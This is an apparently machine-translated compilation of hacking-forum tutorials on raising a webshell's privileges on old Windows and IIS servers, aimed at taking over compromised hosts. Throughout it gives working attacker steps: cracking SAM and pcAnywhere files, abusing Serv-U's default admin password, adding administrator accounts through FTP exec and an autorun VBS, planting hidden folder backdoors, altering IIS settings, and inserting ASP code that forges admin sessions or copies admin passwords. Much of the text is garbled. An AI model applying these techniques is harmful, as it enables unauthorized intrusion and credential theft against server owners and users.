WEBSHELL permission enhancement skills
c: d: e:.....
C:\Documents and Settings\All Users\"Start" Menu\Programs\
See if we can jump here. We can get a lot of useful information from here, such as the Serv-U path.
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
See if you can jump to this directory. If it is available, it is best. Just download its CIF file, crack it to get the pcAnywhere password, log in
c:\Program Files\serv-u\
C:\WINNT\system32\config\
Get its SAM and crack the password
c:\winnt\system32\inetsrv\data\
It is the serveryone, and there are no restrictions in many cases. Upload the tool to increase permissions and execute it
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(if the server supports PHP)
c:\PHP (if the server supports PHP)
Run "cscript C:\Inetpub\AdminScripts\ get w3svc/inprocessisapiapps" to increase permissions
You can also use this code to try to improve, it seems not very ideal.
If the host settings are abnormal, you can try writing bat, vbs and other *s in c:\Documents and Settings\All Users\"Start" menu\Program\Start" to bat, vbs and other *s.
Hide in the root directory
C:\PROGRAM FILES\KV2004\ Binding
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
and
Put the rewritten and your *, VBS or something in the directory that the other administrator is most likely to browse.
replace method bundling
Script Write a startup/shutdown script and restart
Delete SAM:( Wrong
CAcls command
FlashFXP folder
Ring's authority has been increased by 21 major methods!
The following are all summary of my own rights promotion. Many methods have not been tested or successful so far, but I have indeed seen others succeed.
of. I am not talented, except for the first method I study, the rest are summarized by others' experiences. Hope it will be helpful to friends!
Connection method
The condition is that you have strong permissions and the other party does not even have a firewall. Encapsulate a radmin and run it, open the other port, and then radmin and go up.
. I have never been successful. , the port is opened for the other party.
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ List his GIF here
File, install pcanywhere locally
Cracked
C:\WINNT\system32\config\ Cracked by his SAM
Password grab
C:\Documents and Settings\All Users\"Start" Menu\Programs\
Quote: Serv-U, then check the attribute locally, and after knowing the path, see if it can be redirected.
After entering, if you have permission to modify it, add a user and the password is empty.
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
This user has the highest permissions, and then we can ftp to quote site exec xxx to increase permissions
:\winnt\system32\inetsrv\data\
Quote: It is this directory, which is also full control of serveryone. All we have to do is upload the tools to increase permissions.
Then execute
Overflow raising rights
There are many online tutorials, and I won't explain them in detail.
7. Run Script
Quote: Run "cscript C:\Inetpub\AdminScripts\ get w3svc/inprocessisapiapps" to mention
Upgrade permissions
Use this cscript C:\Inetpub\AdminScripts\ get w3svc/inprocessisapiapps
View privileged dll files:
Will join the privileged family again
It is placed in c:\winnt\system32\inetsrv\ (The locations of different machines are not necessarily the same)
We now add cscript set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\"
"C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\""c:\winnt\system32
\inetsrv\"
You can use cscript get /W3SVC/InProcessIsapiApps to check if it has been added
8. Script rights promotion
c:\Documents and Settings\All Users\"Start" Menu\Program\Start" Write bat, vbs
This is Xiaohua's article HOHO
By default, VNC password is stored in HKCU\Software\ORL\WinVNC3\Password
We can use vncx4
Cracking it, vncx4 is very easy to use, just enter it on the command line
c:\>vncx4 -W
Then enter each hexadecimal data above in sequence, and press Enter once without entering one.
Elevate rights
Give the other party an NC, but the condition is that you need to have enough running permissions and then bounce it back to your computer HOHO OK
11. GUEST promotion of power in social engineering
It's very simple. Check his support. Generally speaking, after seeing the account, try to guess the password. It may be the same as the user's password. It may also be his QQ number. Email.
Box number, Mobile number, try to check it out HOHO
Empty connection
If the other party is really idiotic, scan his IPC. If you are lucky, it will still be a weak password.
13. Replacement service
Needless to say, this is it? Personally, I feel quite complicated
.inf
autorun= This=Write it yourself later, HOHO, plus read-only, system, hidden attributes, you can pass it to any disk. Don't believe it
He doesn't run
and
Quote: First of all, we now create a folder locally. The name is not important. Enter it, right-click in the blank space, and select "Customize
Folder "(xp seems not possible) keep clicking, and the default is enough. After completion, you will see that there are two more named Folder in this directory.
Setting the file rack with the file, (if you can't see it, first un-"Hide protected operating system files") and then
We find the file in the Folder setting directory, open Notepad, and add the following code anywhere: <OBJECT
ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="Your backdoor file name">
</OBJECT> Then you put your backdoor file in the Folder setting directory and upload this directory to the other party.
In any directory, it is fine. As long as the administrator browses this directory, it will execute our backdoor.
Coverage and escalate rights
Install a su locally and overwrite your own files with what you downloaded from him.
Get Serv-U, so all the configurations above you are exactly the same as his.
Forwarding port
43958 This is the local management port of Serv -U. Upload him and execute the command: Fpipe –v –l 3333 –r
43958 127.0.0.1 means mapping port 4444 to port 43958. Then you can install a Serv-u locally and create a new one
Server, fill in the other party's IP, the account number is LocalAdministrator, the password is #1@$ak#.1k;0@p. After connecting, you can manage his
Serv-u
Account password leak
If the other party opens an MSSQL server, we can add an administrator account by using the SQL connector (you can connect to the database from it.
See in ASP file) because MSSQL is the default SYSTEM permission.
Quote: The other party did not delete xp_cmdshell Method: Use, fill in the other party’s IP in the host column, User and Pass
Fill in the username and password you have obtained. Just select xp_cmdshell "%s" in format. Then click connect and then you can
Enter the CMD command you want in the CMD column.
Quote: Because it is placed in c:\winnt\system32\inetsrv\ (The locations of different machines are not necessarily the same.
)
We now add cscript set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\"
"C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\inetsrv\"
"C:\WINNT\system32\inetsrv\" "C:\WINNT\system32\""c:\winnt\system32
\inetsrv\"
OK, now you can use cscript get /W3SVC/InProcessIsapiApps to check if it is added.
, note that the get and set in the usage are one to view and the other to set. Also, you want to run the above
C:\Inetpub\AdminScripts>In this directory.
So if you are an administrator and your machine is used to upgrade asp to system permissions, then, at this time, the method of prevention is to
T to create a privileged family, that is, use the set command to cover the things just now.
Winmail
The premise is that you have a webshell quote: /forum/?tid=3587 Go and read it here.
……
In fact, there are many ways to increase permissions. It depends on how you use HOHO. Come on and control the server to the end!
Thank you noangel
WEBSHELL permission enhancement
I believe everyone will get a lot of broilers because of the loopholes. However, they are all WEBSHELL and cannot get system permissions. How to get system permissions? This is exactly what we are going to discuss this time
OK, enter my WEBSHELL
Ahha, not bad, dual CPUs, speed should be kept up, how can I be willing to not take you down?
Enter the password and go inside to see if there is anything good. After flipping through it, there seems to be nothing special. See if you can enter other disk letters. Click on the C drive. It's not bad. You can go in. This way, there is great hope of improvement.
1 serv-u improvement
OK, let's see what programs are in his PROGRAME. Oh, there is SERV-U. I remember once I saw that SERV-U has a default username and password, but the port of the listening port is 43958, and it can only be accessed locally. However, we have a port forwarding tool, so we are not afraid. Let’s take a look at the version of his SERV-U first, telnet 21
The display turned out to be 3.0. Alas, I have to say that this administrator is really incompetent. Later, after finishing, I scanned it and found that there were only FTP holes that were not repaired. Since that's the case, we'll start our escalation of permissions.
Upload FPIPE, port forwarding tool, Figure 3
Enter d:\\wwwroot\\\-v -l 81 -r 43958 127.0.0.1 in the run CMD command, which means forwarding the 43598 port of the machine to the 81 port
Then open the SERV-U on our machine, click Serv-U server, click the server on the menu bar, click Create a new server, then enter the IP and enter the port, remember that the port is the 81 port we forwarded just now. The service name is whatever you like, it's fine. Then there is the user name: LocalAdministrator Password: #l@$ak#.lk;0@P (The passwords are all letters)
OK, then click the server you just built, and you can see the existing user, create a new user by yourself, and add all permissions. Also lock the root directory
Next is login. You must log in under CMD to log in to FTP.
After entering, the general command is the same as DOS. When adding users,
ftp>quote site exec user hk pass /add
ftp>quote site exec localgroup administrators hk/add
If the other party opens 3389, I don’t need to teach you how to do it. If you don’t open it, you will establish a new IPC connection, upload a * or enable 3389 tools.
two
add
[autorun]
open=
dim wsh
set wsh=createObject("")
"net user guest /active:yes",0
"net user guest 520ls",0
"net localgroup administrators guest /add",0
"net user hkbme 520ls /add",0
"net localgroup administrators hkbme /add",0
" /c del ",0
" /c del ",0
But in this way, you must be able to access the other party's root directory. Put these two files in the root directory of the other party’s hard drive. Of course, you can also execute the * program directly, and you also need a * program, but the statement is the same as the last two sentences, and execute the * program through CMD.
three
and
Put the rewritten *, VBS or something into the directory where the other administrator is most likely to browse. If one is not enough, you can put a few more.
Add code
<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="Your backdoor file name">
</OBJECT>
However, the backdoor and these two files must be put together. There is a problem. You can start VBS in combination and delete the uploaded backdoor after the operation is completed. The CODEBASE="".shell is written as above.
Four
replace
Replacement method, you can replace the file being executed. You can get permissions almost immediately with this, but I have never tried it. You can try it and replace the file that the other party is executing with the same file name as it is, and bundled with a *. Why not replace the * directly? If the key program is replaced, then wouldn't it just hang up? So it's better to tie it up
Format
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
[drive1:][path1]filename Specifies the source file.
[drive2:][path2] Specify the file to be replaced
Table of contents.
/A Add the new file to the target directory. Can't be with
Used with /S or /U command line switches.
/P You will be prompted before replacing the file or adding the source file.
Confirm.
/R Replace read-only files and unprotected
document.
/S Replace files of all subdirectories in the target directory.
Cannot be used with /A command option
Use in conjunction.
/W Will you insert it into the disk before running.
/U will only replace or update files earlier than the source file date.
Cannot be used with /A command line switch
This command has not been tested. See if it can replace files in folders that cannot be accessed. You can try it.
five
Script
Write a startup/shutdown script configuration file, the file name is fixed and cannot be changed. The content is as follows:
[Startup]
0CmdLine=
0Parameters=
Save the file to "C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"
The content can be NET USER yonghu mima
It can also be NET USER ADMINistrator XXX
This can restore the password you want to get any username, or add new users yourself, but you have to rely on restart, and also have write permissions for SYSTEM32.
six
SAM
If you can access the other party's SYSTEM32, delete the other party's SAM file, and after it restarts, the ADMIN user password will be empty.
Suddenly I had an idea again. Can I replace it with the REPLACE command? I can extract your SAM file, upload it to any directory, and then replace it. But I don't know if I can replace it if I don't have permission to access SYSTEM32
--
--
Use FlashFXP to increase permissions. You must have gotten a lot of broilers recently:), from the upfile vulnerability of the Dynamic Network some time ago, the latest vulnerability of the Dynamic Network system to a super big vulnerability of the Dynamic Network SQL version discovered by first see. Some people must be busy and not happy, and their method is just to use the backdoor of the asp script. As for the issue of increasing permissions, haha, few people can complete it in one breath. The key is to make a problem in increasing permissions. Many servers are set up very BT, and your asp * may not be able to use it, so there are improvements. We have obtained the permissions of webshell, which is a low-level user. There are many ways to improve permissions. How to improve depends on your own tricks.
First, if there is a pcanywhere server installed on the server, the administrator also provides us with convenience in order to facilitate management. In order to facilitate management, download *.cif local cracking in the system disk, use pcanywhere connection and it will be OK.
Secondly, if the other party has Serv-U, don’t scold me. It should be no problem to increase permissions through modification and fpipe software.
Third, improve by replacing system services.
Fourth, search for files like conn and config to see if you can get the relevant passwords of sa or mysql, which may gain something, etc.
I discovered this method during a boring intrusion process. Using Flashfxp can also increase permissions, but whether the success rate is high depends on your own luck :)
I got a webshell through bbs and put a little horse (I dare not put it now) and I have inserted a piece of code into N files. It's so dark. There is no time to do it when raising permissions. After I went home during the holiday, I saw that I was dizzy and the pony I put up was also K. The BBS was from the access version. Depressed! Suddenly I remembered that I inserted a page into the back door of the asp to see if there was hope. Lose/?id=1 Good guy, still here! Happy
Figure 1
So I uploaded the backdoor of an asp script. How to increase permissions?
Wandered on the host of this website for N minutes, and found the FlashFXP folder under C:\\ Program Files (I thought to myself using this software like me). Figure 2, so I typed the Sites. dat file (edit) What is this password and username, and the password is encrypted.
What if I copy these files back to my computer, which is, what will happen if I replace the corresponding files in my local area?
So I downloaded several files to my computer and replaced the corresponding files in the flashfxp folder in my computer. Open flashfxp and open the site manager item in the site. Be good, be good, be rich
Each site connected by the other administrator through flashfxp is in Figure 3, click Connect. After passing, we have another bunch of broilers, and we have ftp permissions. Upload script *~ Hehe.
I didn't say anything about raising permissions for a long time.
Don’t worry, take a look at the site manager of the other party’s administrator. It has a username and password, and the password is an asterisk. What a pity!
I remembered that the password and username were also displayed in it, and the password was encrypted.
Will the current asterisk password be also encrypted? Just check it out.
What do you think? Novice. I have a good software for viewing asterisks, which is the xp asterisk password viewer. By viewing and encrypting the password in the middle, it is used to compare it. Looking at the comparison between Figure 4 and Figure 5, it is obvious that the passwords viewed in the site manager are displayed in plain text. Be rich
The next step is to use the xp asterisk password viewer software to extract the password and username. The readers' complex passwords really miss the time they played Sniff back then. hehe
Password: b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
Username: bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn *82/+69
(The password and username above have been modified as necessary)
So much information, according to social engineering concepts, does not have an administrator's password. I don't believe it if I beat it to death. Finally I got the password of this website administrator found from this pile of things.
I think this problem should be fed back to the flashfxp official, so that they can fix this vulnerability or error in the next version. After later testing, just replace the file containing the password and username to the corresponding local file, and you can restore the passwords of each site of the other party's administrator locally. I hope that when you encounter fla shfxp during invasion, you can think of this method, and at least you can get a bunch of new broilers. Don't be careful to try it? I hope it can help you penetrate.
|
-- -- |
--
parsed into system to improve permissions
There are two traditional asp permissions that improve asp permissions on the Internet:
1. In graphical form, set the default site---->home directory---->application protection to low, so that the asp permission can be set to system.
But this method of improvement is easy to discover, so there is another method in the network that is generally used to increase permissions. And this is also today.
What I want to talk about is raising permissions.
2. Use it to get it done.
I have seen a lot of animations and articles on the Internet that teach you how to use this method, but I have not seen a single article introducing the principles so far. Let me talk about my personal opinion:
Let me give you an example:
There is a group of dogs, and there are several elder-level dogs in this group. They have supreme authority, while the other dogs have pitifully few authority.
Go to computer:
In IIS, there are several Dll files that have privileges, which we can understand as system permissions, just like elder-level dogs. And the parsing of asp is like a
An ordinary dog has very little authority.
So, if we also become an elder-level dog, then won’t Asp have system permissions? This is valid. So our idea is
Add to the privileged DLL family. The steps to improve are:
<1>First check what are the privileged chapters.
<2>Add to join the privileged family
Okay, let’s practice this process now.
1) View privileged dll files:
The command is:cscript get /W3SVC/InProcessIsapiApps
Get displayed as:
C:\\Inetpub\\AdminScripts>cscript get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows Script Host Version 5.1 for Windows
Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\\WINNT\\system32\\"
"C:\\WINNT\\system32\\inetsrv\\"
"C:\\WINNT\\system32\\inetsrv\\"
"C:\\WINNT\\system32\\inetsrv\\"
"C:\\WINNT\\system32\\"
Seeing that, he explained that the privileged family is:
These files, different machines, may be different.
2) Join the privileged family:
Because it is placed in c:\\winnt\\system32\\inetsrv\\\ (The positions of different machines may not be the same)
We now add cscript set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\" "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\inetsrv\\"
OK, now you can use cscript get /W3SVC/InProcessIsapiApps to check if it is added.
, note that the get and set in the usage are one to view and the other to set. Also, if you run the above, you need to go to C:\\Inetpub\\AdminScripts>.
So if you are an administrator and your machine is used to upgrade asp to system permissions by someone, then, at this time, the method of defense is to T out of the privileged family, that is, use the set command to cover the things just now.
Example: cscript set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\inetsrv\\" "C:\\WINNT\\system32\\"
This is enough. When you use cscript get /W3SVC/InProcessIsapiApps �
Explanation: Asp's permission is restored to the previous permissions.
winNT/2000 upgrade permissions
Windows NT/2000 General improvement method
After gaining certain access to the system, an attacker usually needs to promote his own permissions to the administrator group, so that the attacker controls the computer system. There are mainly the following methods: 1. Obtain the administrator password and you can use the password to enter the system next time; 2. Create a new user first, and then add this ordinary user to the administrator group, or simply add an inconspicuous user such as a guest to the administrator group; 3. Install the backdoor.
This article briefly introduces the methods commonly used by attackers to increase permissions in Windows NT4 and Windows 2000. Here are the specific methods:
Method 1: Download the %windir%\\repair\\sam.* (WinNT 4 is sam._ and Windows2000 is sam ) file, and then use L0pht and other software to crack it. As long as you can get it and you are willing to spend time, you can definitely crack it.
Problem: (1) The attacker may not be able to access the file (see the attacker's identity and administrator settings); (2) This file is the account list when the last system backup (or maybe it was the first time the system is installed). If you change the account password in the future, it will be useless.
Method 2: Use pwdump (which comes with L0pht, invalid under Windows 2000) or pwdump2 to obtain the current user list and password encryption list of the system, and then use L0pht to crack this list.
Problem: Ordinary users cannot successfully run the pwdump class program (no permissions). For example, when entering the system using a unicode vulnerability, it is IUSR_computer. This user generally belongs to the guests group, and running the pwdump class program will fail.
(The above two are offline)
Method 3: Use Enum and other programs to remotely crack and guess the password. enum can use the specified dictionary to crack a user of the remote host.
Problem: (1) If the system sets account lock, if the crack fails several times, the account will be locked and cannot be cracked for the time being; (2) The remote system needs to open the Netbios connection, which is the TCP port 139. If filtered with a firewall, Enum will not be able to connect to the host.
(The above method is to obtain the password by cracking, and there is also a method to directly increase the permissions of the current user or add the user to the administrator group.)
Method 4: GetAdmin (WinNT 4 ), PipeUpAdmin (Windows 2000 ), and the current user account can be added to the administrator group when running on this machine. PipeUpAdmin is more powerful, and both ordinary users and Guests group users can run successfully.
Problem: GetAdmin has patches to fix in SP4 and cannot be used on WinNT 4 systems higher than SP4. Of course, there was an enhanced version of GetAdmin later, but it seems that it cannot run successfully under SP6a.
Note: This method takes advantage of the security vulnerability of the WinNT 4 system, and patches can be installed to solve this problem.
(In addition, there are workarounds.)
Method 5: Specify user Shell program () in WinNT 4 and Windows 2000 registries
Instead of using an absolute path, a relative path file name is used (considering compatibility issues).
Due to the search order of the program at system startup, %Systemdrive%\\ (the operating system installed and in the directory) program execution, this provides an opportunity for the attacker to execute his own program the next time the user logs in.
Problem: The attacker must have the write permission to install the system logic disk and directory, and ordinary administrators set the directory to be blocked by ordinary users.
Note: This method takes advantage of the security vulnerability of WinNT 4/Windows 2000 system, and patches can be installed to solve this problem.
Method 6: *: Upload *s, then run *s. After the system restarts, the *s are the identity of the local logged in user. Then, after the attacker connects, he has permission to log in to user. Because the administrator is usually always logged into the system locally, it is very likely that the administrator's permission will be obtained.
Problem: (1) Antivirus software or virus firewall may prevent *s from running, and may also kill *s.
(2) Some *s cannot run under the Guests group, which may be related to the way it adds automatic running; if there is no permission to rewrite the automatic running location of the registry, it cannot be written to the %system%\\system32 directory (General *s change the file name and then write to the system directory. If there is no permission to write to the system directory, the * cannot be successfully executed).
Solution: However, there are also compression programs (not the commonly referred to as compression programs. After compressing executable programs, the files become smaller, but they can still be executed normally) to compress the *s, thus escaping the feature code detection of antivirus software. I used Aspack to successfully compress a * and escaped the detection of the official version of Kingsoft Antivirus. However, some *s Aspack cannot be compressed, like a glacier.
Method 7: Gina, GinaStub *. Although this is also called a *, its functions are very different from the one above, because a general * installs a server end on the other party. Once it is run, it can be connected to the server end using the client end and operate it. Ginastub generally only has one dynamic connection library file, which needs to be manually installed and uninstalled. Its function is not to use the client to control the server side, it just captures the user's login password.
Problem: Installation is troublesome, the possibility of success is low, and improper installation will cause the installed system to fail to start.
Note: This method does not exploit system security vulnerabilities, so this problem cannot be solved by installing patches. For Gina, you can refer to another article of my article "WinLogon Login Management and Introduction to GINA"
Method 8: Local overflow. Buffer overflow is the best way to attack, because you can generally obtain system permissions or administrator permissions; however, many remote overflow attacks do not require permissions to execute programs in advance, and local overflow is just suitable for raising permissions. Win NT4’s IIS4’s ASP extension has a local overflow vulnerability, and Windows 2000’s static image service also has an overflow vulnerability. Using this vulnerability, attackers can gain system permissions. Of course, there are many programs with overflow vulnerabilities in Windows NT and Windows 2000. These programs are not always running, so the possibility of being exploited is relatively small.
Problem: (1) The overflow vulnerability of ASP extension requires the attacker to have the permission to write to the website's script directory in order to put the attack program on the website and then execute it.
(2) The static image service is not installed by default, and it will only be automatically installed when the user installs static image devices (such as digital cameras, scanners, etc.) on Windows 2000.
Note: This method takes advantage of the security vulnerability of WinNT 4/Windows 2000 system, and patches can be installed to solve this problem.
Windows 2000 dedicated method to improve vulnerability method 1: The input method vulnerability of Windows 2000. Using this vulnerability, anyone can execute programs as LocalSystem, so that they can be used to increase permissions. However, this vulnerability is generally limited to people who physically contact Windows 2000 computers. Of course, if the terminal service is opened, the attacker can also remotely exploit the vulnerability.
Note: This method takes advantage of the security vulnerability of the Windows 2000 system, and patches can be installed to solve this problem.
Method 2: Use the Network DDE DSDM service vulnerability of Windows 2000. Ordinary users can execute any program in LocalSystem, and they can use this to change passwords, add users, etc. Guests group users can also successfully exploit the vulnerability.
Problem: This service is not started by default, and this service needs to be started.
Note: This method takes advantage of the security vulnerability of the Windows 2000 system, and patches can be installed to solve this problem.
Method 3: When the TELNET service process of Windows 2000 is established, the service will create a named pipe and use it to execute commands. However, the name of the pipeline can be foreseeable. If TELNET finds an existing pipeline name, it will use it directly. An attacker exploits this vulnerability to pre-establish a pipeline name. When TELNET creates a service process, the attacker code will be run in the local SYSTEM environment.
Note: This method takes advantage of the security vulnerability of the Windows 2000 system, and patches can be installed to solve this problem.
Method 4: There is a vulnerability in WINDOWS 2K to leverage Debug Registers to increase permissions. If an attacker can run a program in WIN2K, he can at least obtain write rights to %Windir%\\SYSTEM32 and registry HKCR. Because x86 Debug Registers DR0-7 is globally shared for all processes, setting hardware breakpoints in one process will affect other processes and service programs.
Note: This method exploits the security vulnerability of the Windows 2000 system, but so far, Microsoft still has no patches to install, but the vulnerability attack program has appeared, so it can only block the attacker's entrance to prevent the exploitation of the vulnerability.
--
-- Cleverly cooperate with the asp * to obtain the backend management permission top (this is a classic... I won’t say much about it if I understand it myself)
The upload vulnerabilities of the Dynamic Network forum that have been flooded some time ago and the upload vulnerabilities exposed by various Asp systems recently have been exposed. Many friends may have many webshell broilers in their hands. As for how to choose these chickens, the way to change from person to person. Some people continue to increase their permissions and further invade, while others just look at it. They forget it after putting the horse on it. There are also some friends. When the freshness of webshell passes, the mystery and temptation of the background will be greatly increased. In fact, for many powerful systems, getting the backend means getting a good backdoor. Haha... But now many of the newer versions of Asp system passwords are MD5 encrypted and verified with strict verification procedures, but can't we break through these restrictions? no! Today I am going to talk about how to break through these restrictions and let us go straight to the backstage. Having a stable is easy to do, follow
me............
session deception
First, let’s briefly talk about the authentication principles of general Asp systems.
Generally speaking, after the backend administrator enters the account password on the login page, the program will take the username and password he submitted to search in the database administrator table. If there is this person's account password, you will be considered an administrator, and then give you a session value indicating your identity. Or the program first extracts your username and password, and then goes to the administrator's administrator table in the database to retrieve the administrator's account and password to compare with the one you submitted. If it is equal, it will give you a session value indicating your identity as above. Then when you enter any management page, it must first verify your session value. If it is an administrator, let you pass. If it is not, it will guide you back to the login page or some strange warnings will appear. These are all related to the programmer's personal preferences.
After knowing the principle, our current idea is to modify its program through our asp * and then get an administrator session. In this way, although we do not have an administrator password, we still pass in the background without any obstacles. I call this method session cheating. Due to the limited space, each system cannot be explained in detail. This article only uses the power article system as an example to illustrate.
Power Article System 3.51, (Figure 1)
Figure 1
In fact, all versions of the Power Article System are killed, including Dongyi. You can practice it yourself.
Let’s take a look at its verification content first. The verification page of Dynamic Article 3.51 is in Admin_ChkLogin.asp
, the verification content is as follows:
............
else
rs("LastLoginIP")=("REMOTE_ADDR")
rs("LastLoginTime")=now()
rs("LoginTimes")=rs("LoginTimes")+1
=SessionTimeout
session("AdminName")=rs("username")
set rs=nothing
call CloseConn()
"Admin_Index.asp"
The previous ellipsis is a verification that the username and password are incorrect. Until else, look at it. If the username and password are correct, you will be given two session values:
=SessionTimeout
session("AdminName")=rs("username")
We are looking at how other management pages verify sessions. admin_index.asp is like this from the beginning:
if session("AdminName") = "" then "Admin_Login.asp"end if
It seems very strict, but let's take a look at it. Its value here verifies an AdminName session. As long as our session content is AdminName, it will be passed? Okay, let’s start working, and we will get its administrator account first. I don’t want to teach you this, right? You can know if you go to his website for a walk or download its database directly. Let’s find a page to modify it. I’ll find a page with less people and more content (friendly link page) to modify it. Haha, it’s hard for the administrator to check it out. Use the editing function of the asp * to edit its content. Add the following sentences to the hidden place under his page:
dim id
id=trim(request("qwe"))
if then
session("AdminName")="admin" 'This is a hypothesis. In actual operation, you can change it to the administrator account you want.
end if
Let me briefly say the meaning of this sentence, which means to get the value of hehe from the address bar. If hehe=120, then the system will give us a session with the value admin. OK, let's enter and take a look, Figure 2:
Figure 2
Did you see any abnormalities? No? It's still a normal page, but we then enter its backend management homepage in the address bar to see if we have entered? Figure 3:
Figure 3
Haha, don't do bad things......
Let’s summarize: First, we find the administrator account, then find its verification page, and write the backdoor we want based on its verification content. Different systems have different verification methods. For example, Qingchuang Article System not only needs to verify your username but also have to verify the level, but our overall idea is that we will join whatever it verifies.
Password stolen
It can be said that the above method is pale and powerless in front of Dynamic Network forums or other forums, because generally forums have strong interactive nature, they have considered a lot of verification. Take Dongwang as an example. If you want to log in to the background, it first verify that you have logged in to the front desk first. If not, you will return an error page to you. After you log in to the front desk, the system will give you a seesion to record your CacheName and your ID, and then when you log in to the back desk, you will compare whether your front and back desk identities are the same, and you will pass it all the time. Otherwise, kill, facing such strict verification, is there no way for us to base the back desk? Yes, there is no more (who throws me with the egg? It’s so wasteful.), but we can think of new ways. Since the verification is so strict, what if I go in with the password openly? Therefore, a new idea here is to get its plaintext password. When will there be a clear text password? By the way, just when the administrator logs in. OK, we're just doing it there, send us the password for login, and then we'll log in with it and its password. Haha, isn't it very much like sniffer? In the past few months, I just used hardware sniffer with my good brother Qianlong in the wild to cooperate with the Provincial Network Security Bureau to remove an illegal movie website, a total of 4,000G of hard drives, dozens of servers, one word: cool
OK, let's start modifying its program. Edit, add the following sentences:
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username=\'"& request("username")&"\') where
UserName=\'aweige\'"
(sql)
end if
end if
The meaning of these sentences is that if admin (assumably, change it to the administrator name you want in actual operation) is successful in logging in, update the database and put its password into the email of my information. Of course, you must first register a username in the forum. The result is shown in Figure 4:
Figure 4
Also, if the default database admin table name below 7.0 is a bit different from above 7.0, so it cannot be copied in actual operation.
Postscript:
I can't think of any more effective solutions for the above two methods until now, because your website was released by someone, and you can't stop others from inserting it. If anyone has a good solution, please tell me.
In addition, I hope everyone will not do anything to destroy it. I really don’t want to see it at that time. I wish all network administrators good luck. I hope you won’t encounter crakers.
--
--
Use asp * and KV2004 to get administrator permissions
I haven't written any articles since I've been back. This is the first time. Please forgive me if I don't write well. Don't make fun of me. There is no technology here, just a little experience of me, a rookie, it's OK. . .
Some time ago, the loopholes in Dongwang were very popular. This loophole is indeed very powerful. I believe that many novices have planted many backdoors on Youdongwang's website like me, but the permissions of the asp * are indeed very solid. Apart from deleting some articles, deleting some pictures seems useless. If you don’t get administrator permissions, you will simply let down the experts who discovered this vulnerability ~v~. OK, find a way to increase permissions, I'll look for it! Almost all the methods to increase permissions online have been used, and they are useless. The patches are very complete! Next, I want to untie the administrator's password with findpass, but it failed. Findpass requires administrator permissions to be useful. Use pslist to see if the ones are installed in Rising + Skynet. Most of the tools on the Internet are generally useless when they encounter this defense combination. Planting a *? No, come
The authority is too low, and secondly, it is rare to survive under the siege of Ruixing Killingtian.com. I want to put a bat file that adds user permissions into the startup group. Although this method is a bit stupid, it has certain feasibility. It is because the permissions are not enough and cannot be added. "Program Files" "winnt" "Documents and Settings" under the c drive does not have permission to write, let alone the registry. I was depressed, so I left a word for the administrator and then hurriedly got off the line.
On the second day, I came up and saw that the hehe picture was changed back. The administrator should have discovered it, and it is even more difficult to succeed this time. I boarded the asp * and went in and took a look. Several exes uploaded yesterday were deleted. Fortunately, the asp * survived, hey! The file A of the c disk is called KV2004. It turned out that the administrator uninstalled Rising, installed a kv2004, and went to Program Files to see that Rising was indeed uninstalled. (I'll talk about it here. The default installation path of most antivirus software is c:\\Program Files\\, but the default installation path of kv is c:\\kv2004\\) Here comes the opportunity, we can bundle the execution file on kv2004 and start it with kv. Because kv is not in the three files A of "Program Files" "winnt" "Documents and Settings", it is very likely that I can modify it.
Or upload a file. action! In kv2004, find a htm file to delete: (see if there is any write-deletion permission)
C:\\>del c:\\kv2004\\
access denied
Strange, let’s take a look at the file A attribute
C:\\>attrib c:\\kv2004
S R C:\\KV2004
Oh, it's read-only.
C:\\>attrib -r -s c:\\kv2004
OK! Try it
C:\\>del c:\\kv2004\\
Success! It is better to write a bat file that activates an account and increases permissions, and then bundle the bat file with the system service file of kv2004 (note that there are more bundlers to bundle one.
Use kv2004 to scan it once, because many files generated by the bundler will be processed as a virus) and are ready to be uploaded, so delete the original one first.
C:\\>del c:\\kv2004\\
access denied
Maybe it's called by Windows and cannot be deleted. Is there no way? No, I can't delete it and change my name
C:\\>ren c:\\kv2004\\
OK! Then use the asp * to upload the modified ones to kv2004, and then go to bed.
Come on and use it after 4 hours:
net user account
I'm already in the administrators group. Next, I need to turn off the firewall, antivirus software, or plant *s, you can do whatever I want, haha!
I think there is no fixed pattern for invasion. If you analyze the specific situation in detail, antivirus software can also help us. I only provide one idea here. Please give me advice.
How to bypass the firewall to increase permissions
The focus of this article is to improve webshell permissions and bypass the firewall. Experts should not laugh.
Let's talk less nonsense, let's get to the point.
